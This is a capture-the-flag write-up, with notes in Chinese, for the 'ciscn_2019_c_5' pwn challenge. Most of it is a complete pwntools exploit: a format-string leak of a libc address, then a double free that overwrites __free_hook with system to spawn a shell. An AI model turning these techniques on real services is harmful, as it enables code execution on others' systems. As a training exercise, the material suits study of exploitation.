ciscn_2019_c_5

保护全开

有格式化字符串漏洞但是用%n$p之类的会报错，用%p不会，算得偏移是8

p.sendlineafter('name?','%p%p%p%p%p%p%p')
p.recvuntil('59')
io_stder=int(p.recv(14),16)

接收的话不是p.recvuntil(‘\x59’)，而是p.recvuntil(‘59’)，这里我犯了个错误

这里对应第七个参数

exp

from pwn import *
p=process('./ciscn_2019_c_5')
#p=remote('node5.buuoj.cn',28941)
elf=ELF('./ciscn_2019_c_5')
libc=elf.libc

def add(size,story):
    p.sendlineafter(':','1')
    p.sendlineafter('story:',str(size))
    p.sendlineafter('story:',story)

def edit():
    p.sendlineafter(':','2')

def show():
    p.sendlineafter(':','3')

def free(idx):
    p.sendlineafter(':','4')
    p.sendlineafter('index:',str(idx))
def debug():
    gdb.attach(p)
    sleep(1)

p.sendlineafter('name?','%p%p%p%p%p%p%p')
p.recvuntil('59')
debug()
io_stder=int(p.recv(14),16)#.ljust(8,b'\x00')
p.sendlineafter('input your ID.','kkkk')

base=io_stder-libc.sym['_IO_2_1_stderr_']
system=base+libc.sym['system']
print('io_st  '+hex(io_stder)+'system  '+hex(system))
free_hook=base+libc.sym['__free_hook']
add(0x60,'aaaa') #0
add(0x60,'bbbb') #1
add(0x60,'bin/sh\n') #2

free(0)
free(1)
free(0)

add(0x60,p64(free_hook)) #3
add(0x60,'aaaa') #4
add(0x60,'dddd') #5
add(0x60,p64(system))
free(2)
#

p.interactive()